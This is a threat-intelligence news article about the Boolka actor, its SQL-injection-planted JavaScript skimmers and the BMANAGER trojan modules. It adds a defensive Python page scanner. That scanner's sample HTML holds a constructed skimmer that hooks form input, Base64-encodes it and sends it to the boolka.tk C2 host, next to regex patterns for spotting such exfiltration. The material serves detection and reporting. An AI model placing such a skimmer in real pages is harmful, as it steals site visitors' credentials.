A previously undocumented threat actor dubbed Boolka has been observed compromising websites with malicious scripts to deliver a modular trojan codenamed BMANAGER.
"The threat actor behind this campaign has been carrying out opportunistic SQL injection attacks against websites in various countries since at least 2022," Group-IB researchers Rustam Mirkasymov and Martijn van den Berk said in a report published last week.
"Over the last three years, the threat actors have been infecting vulnerable websites with malicious JavaScript scripts capable of intercepting any data entered on an infected website."
Boolka gets its name from the JavaScript code inserted into the website that beacons out to a command-and-control server named "boolka[.]tk" every time an unsuspecting visitor lands on the infected site.
The JavaScript is also designed to collect and exfiltrate user inputs and interactions in a Base64-encoded format, indicating the use of the malware to grab sensitive details like credentials and other personal information.
Furthermore, it redirects users to a bogus loading page that prompts victims to download and install a browser extension when, in reality, it drops a downloader for the BMANAGER trojan, which, in turn, attempts to fetch the malware from a hard-coded URL. The malware delivery framework is based on the BeEF framework.
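The indicators described above (a script beaconing to the reported C2 domain, and inline code that hooks user input, Base64-encodes it and sends it out) can be turned into a simple page scan. The following Python is an added example written for this article, not code from the Group-IB report or from the campaign; the sample HTML and the skimmer-style script in it are constructed, and only the C2 domain comes from the report.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Indicator taken from the report: the beacon / command-and-control domain.
KNOWN_C2_HOSTS = {"boolka.tk"}

# Constructed sample page (not the actual Boolka payload): one benign script and
# one injected script that hooks input events, Base64-encodes what it captures
# and beacons it to the C2 host via an image request.
SAMPLE_HTML = """<html><body>
<form><input name="user"><input name="pass" type="password"></form>
<script src="/static/app.js"></script>
<script>
document.addEventListener('input', function(e){
  var p = btoa(e.target.name + '=' + e.target.value);
  new Image().src = 'https://boolka.tk/c?d=' + p;
});
</script>
</body></html>"""

class ScriptCollector(HTMLParser):
    """Collect every <script> element as (src attribute, inline body)."""
    def __init__(self):
        super().__init__()
        self.scripts, self._src, self._buf = [], None, None
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._src, self._buf = dict(attrs).get("src"), []
    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)
    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.scripts.append((self._src, "".join(self._buf)))
            self._buf = None

# All three together form the skimmer pattern: capture, encode, exfiltrate.
SKIMMER_PATTERNS = [
    re.compile(r"addEventListener\(\s*['\"](input|keydown|keyup|change|submit)"),
    re.compile(r"\bbtoa\s*\("),                                            # Base64 encoding
    re.compile(r"new Image\(\)\.src|fetch\(|XMLHttpRequest|sendBeacon"),   # exfil channel
]

def analyse(html):
    """Return a list of (script_index, reason) findings for suspicious scripts."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for i, (src, body) in enumerate(parser.scripts):
        host = urlparse(src).hostname if src else None
        if host in KNOWN_C2_HOSTS:
            findings.append((i, f"script loaded from known C2 host {host}"))
        if any(h in body for h in KNOWN_C2_HOSTS):
            findings.append((i, "inline script references known C2 host"))
        if all(pat.search(body) for pat in SKIMMER_PATTERNS):
            findings.append((i, "input hook + Base64 + exfil channel (skimmer pattern)"))
    return findings
```

Running `analyse(SAMPLE_HTML)` flags only the second script, once for the C2 reference and once for the skimmer pattern; the benign script produces no findings.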
The trojan, for its part, serves as a conduit to deploy four additional modules, including BMBACKUP (harvest files from particular paths), BMHOOK (record which applications are running and have keyboard focus), BMLOG (log keystrokes), and BMREADER (export stolen data). It also sets up persistence on the host using scheduled tasks.
"Most samples make use of a local SQL database," the researchers noted. "The path and name of this database is hard-coded in the samples to be located at: C:\Users\{user}\AppData\Local\Temp\coollog.db, with user being the username of the logged-in user."
Boolka is the third actor after GambleForce and ResumeLooters to leverage SQL injection attacks to steal sensitive data in recent months.
"Starting from opportunistic SQL injection attacks in 2022 to the development of his own malware delivery platform and trojans like BMANAGER, Boolka's operations demonstrate the group's tactics have grown more sophisticated over time," the researchers concluded.
"The injection of malicious JavaScript snippets into vulnerable websites for data exfiltration, and then the use of the BeEF framework for malware delivery, reflects the step-by-step development of the attacker's competencies."
References
[1]https://thehackernews.com/2024/06/new-cyberthreat-boolka-deploying.html
Originally published on the WeChat public account 知机安全: New cyber threat 'Boolka' deploys BMANAGER trojan via SQLi attacks